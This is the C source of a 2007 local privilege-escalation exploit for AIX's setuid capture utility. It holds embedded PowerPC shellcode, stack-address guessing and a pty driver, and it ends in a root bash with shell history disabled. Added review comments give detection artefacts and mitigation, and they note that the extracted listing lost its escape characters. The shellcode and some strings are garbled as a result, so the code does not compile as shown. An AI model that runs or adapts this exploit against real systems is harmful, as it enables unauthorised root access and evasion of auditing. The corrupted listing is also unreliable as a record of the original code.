
aix53-capture.txt

Posted on 28 July 2007

/*
 * 07/2007: public release
 *
 * qaaz@aix:~$ ./aix-capture
 * --------------------------------
 * AIX capture Local Root Exploit
 * By qaaz
 * --------------------------------
 * bash: no job control in this shell
 * bash-3.00#
 *
 * NOTE(review): as rendered on this page the listing is not compilable as-is:
 * backslash escapes ("\x..", "\n") and all line breaks were lost in extraction,
 * so several string literals below no longer hold what the author compiled.
 * The code is re-wrapped here for readability only; no token has been changed.
 *
 * Defender's summary (taken from the code itself): the program runs TARGET
 * (/usr/bin/capture, presumably installed setuid -- not stated here) on a
 * pseudo-tty with a caller-controlled environment (PAD=, SHELL=, EGG=) and
 * ends in a shell started after setuid(geteuid()). Artefacts visible in this
 * code that are worth alerting on: a `capture` process whose SHELL variable
 * points at /proc/<pid>/object/a.out, this binary re-invoked with argv[0]
 * "bsh" (apparently via that SHELL path), and an interactive bash started with
 * HISTFILE=/dev/null from such a chain. Mitigation is the vendor fix for
 * capture or removing its setuid bit.
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <fcntl.h>
#include <unistd.h>
#include <sys/wait.h>
#include <sys/select.h>
/* NOTE(review): kill() and SIGTERM (used in main) need <signal.h>, which is
 * not included; on AIX it may only be reached transitively. */

#define TARGET "/usr/bin/capture"                   /* binary executed by the driver stage in main() */
#define VALCNT 40                                   /* repetitions of the computed address in the "bsh" stage */
#define MAX(x,y) ((x) > (y) ? (x) : (y))            /* evaluates each argument twice */
#define ALIGN(x, y) (((x) + (y) - 1) / (y) * (y))   /* round x up to a multiple of y; evaluates y three times */

/*
 * Machine-code payload passed to the target inside the EGG= environment
 * string (see main). As rendered here the "\x" escapes have lost their
 * backslashes, so this array holds the ASCII text "x60x60..." rather than
 * the intended byte values.
 */
unsigned char qaazcode[] =
    "x60x60x60x60x60x60x60x60"
    "x7cx63x1ax79x40x82xffxfd"
    "x7exa8x02xa6x3axb5x01x01"
    "x88x55xffx5bx3axd5xffx1b"
    "x7exc8x03xa6x4cxc6x33x42"
    "x44xffxffx02x38x75xffx5f"
    "x38x63x01x01x88x95xffx5d"
    "x38x63x01x02x38x63xfexff"
    "x88xa3xfexffx7cx04x28x40"
    "x40x82xffxf0x7cxa5x2ax78"
    "x98xa3xfexffx88x55xffx5c"
    "x38x75xffx5fx38x81xffxf8"
    "x90x61xffxf8x90xa1xffxfc"
    "x4bxffxffxbdxb8x05x7cxff";

/*
 * Bidirectional relay: whatever becomes readable on p1[0] is copied to p1[1],
 * and whatever becomes readable on p2[0] is copied to p2[1], until select()
 * fails or either source returns EOF/error. The return values of write() are
 * never checked, so a short or failed write silently drops data.
 */
void shell(int p1[2], int p2[2])
{
    ssize_t n;
    fd_set rset;
    char buf[4096];

    for (;;) {
        FD_ZERO(&rset);
        FD_SET(p1[0], &rset);
        FD_SET(p2[0], &rset);
        n = select(MAX(p1[0], p2[0]) + 1, &rset, NULL, NULL, NULL);
        if (n < 0) {
            perror("[-] select");
            break;
        }
        if (FD_ISSET(p1[0], &rset)) {
            n = read(p1[0], buf, sizeof(buf));
            if (n <= 0)
                break;
            write(p1[1], buf, n);   /* return value unchecked */
        }
        if (FD_ISSET(p2[0], &rset)) {
            n = read(p2[0], buf, sizeof(buf));
            if (n <= 0)
                break;
            write(p2[1], buf, n);   /* return value unchecked */
        }
    }
}

/* just because you don't understand it doesn't mean it has to be wrong */
/*
 * Estimates where the value of the "EGG=" string will sit in the environment
 * block of a process started with args/envs. It measures this process's own
 * argv/envp strings (which begin at argv[0]) and apparently assumes the new
 * process's strings end at the same top-of-stack address -- an assumption
 * that is not verified anywhere in this file.
 *
 * Side effect: appends "X" to envs[0] until the EGG offset is 4-byte aligned.
 * envs[0] must therefore have spare room; main() passes a 16-byte buffer
 * holding "PAD=X", so at most 3 bytes are appended.
 *
 * `ulong` is a non-standard typedef (AIX <sys/types.h>, presumably).
 */
ulong get_addr(char *argv[], char *envp[], char *args[], char *envs[])
{
    ulong top, len, off;
    int i;

    /* total size of this process's argv + envp strings, NUL terminators included */
    len = 0;
    for (i = 0; argv[i]; i++)
        len += strlen(argv[i]) + 1;
    for (i = 0; envp[i]; i++)
        len += strlen(envp[i]) + 1;
    top = (ulong) argv[0] + ALIGN(len, 8);

    /* total size of the new args + envs strings, and the offset of EGG's value within them */
    len = off = 0;
    for (i = 0; args[i]; i++)
        len += strlen(args[i]) + 1;
    for (i = 0; envs[i]; i++) {
        if (!strncmp(envs[i], "EGG=", 4))
            off = len + 4;
        len += strlen(envs[i]) + 1;
    }
    /* pad envs[0] until `off` is 4-byte aligned (comma operator: one statement) */
    while (off & 3)
        strcat(envs[0], "X"), off++, len++;

    return top - ALIGN(len, 4) + off;
}

/*
 * Three modes, chosen by how the binary was started:
 *   1. envp empty        -> final stage: fd 3 becomes stdin, setuid(geteuid()),
 *                           exec an interactive bash (or sh) with HISTFILE=/dev/null.
 *   2. argv[0] == "bsh"  -> helper stage: print a terminal control sequence
 *                           (as rendered, "x1b[" has lost its "\x1b[" escape)
 *                           carrying the get_addr() value VALCNT times, then copy
 *                           stdin to stdout one byte at a time.
 *   3. otherwise         -> driver: create a pipe and a pseudo-tty, fork, run
 *                           TARGET in the child on that tty with the crafted envs,
 *                           relay via shell(), then terminate the child.
 *
 * Robustness notes: sprintf() into the fixed buffers is unbounded (sizes fit
 * only because qaazcode and the /proc path are short); the read() of the
 * child's banner and the write() of the wake-up byte are unchecked; several
 * printf banner strings have lost their trailing "\n" in rendering.
 */
int main(int argc, char *argv[], char *envp[])
{
    char pad[16] = "PAD=X", egg[512], bsh[128], buf[1024];
    char *args[] = { TARGET, "/dev/null", NULL };
    char *envs[] = { pad, bsh, egg, NULL };
    int ptm, pts, pi[2];
    pid_t child;

    /* EGG = payload bytes followed by the /proc path of this very executable;
     * SHELL is pointed at the same path so TARGET re-runs this program */
    sprintf(egg, "EGG=%s/proc/%d/object/a.out|", qaazcode, getpid());
    sprintf(bsh, "SHELL=/proc/%d/object/a.out", getpid());

    if (!envp[0]) {
        /* mode 1: exec'd with an empty environment -> spawn the shell */
        dup2(3, 0);
        setuid(geteuid());
        putenv("HISTFILE=/dev/null");
        execl("/bin/bash", "bash", "-i", NULL);
        execl("/bin/sh", "sh", "-i", NULL);
        perror("[-] execl");
        exit(1);
    } else if (argc && !strcmp(argv[0], "bsh")) {
        /* mode 2: invoked under the name "bsh" (presumably by TARGET via SHELL=) */
        char i, ch;   /* `i` is a char loop counter; VALCNT (40) fits */
        ulong addr = get_addr(argv, envp, args, envs);
        printf("x1b[");
        for (i = 0; i < VALCNT; i++)
            printf("%lu;", addr);
        printf("0A ");
        fflush(stdout);
        while (read(0, &ch, 1) == 1)
            write(1, &ch, 1);
        exit(0);
    }

    /* mode 3: driver */
    printf("-------------------------------- ");
    printf(" AIX capture Local Root Exploit ");
    printf(" By qaaz ");
    printf("-------------------------------- ");

    if (pipe(pi) < 0) {
        perror("[-] pipe");
        exit(1);
    }
    /* /dev/ptc: pty master clone device (AIX); ttyname() on it names the slave side */
    if ((ptm = open("/dev/ptc", O_RDWR)) < 0 || (pts = open(ttyname(ptm), O_RDWR)) < 0) {
        perror("[-] pty");
        exit(1);
    }
    if ((child = fork()) < 0) {
        perror("[-] fork");
        exit(1);
    }
    if (child == 0) {
        /* child: stdio on the pty slave, pipe read end on fd 3, then run TARGET */
        dup2(pts, 0);
        dup2(pts, 1);
        dup2(pts, 2);
        dup2(pi[0], 3);
        execve(TARGET, args, envs);
        perror("[-] execve");
        exit(1);
    }
    close(pi[0]);
    close(pts);
    sleep(1);   /* crude "wait for the child to come up"; racy by construction */
    read(ptm, buf, sizeof(buf));   /* drain the child's initial output; result unchecked */
    write(ptm, " ", 1);            /* wake-up byte; likely "\n" before the escape was lost */
    /* relay: our stdin -> child's fd 3 (pipe write end), pty master -> our stdout */
    shell((int[2]) { 0, pi[1] }, (int[2]) { ptm, 1 });
    kill(child, SIGTERM);
    waitpid(child, NULL, 0);
    return 0;
}

 
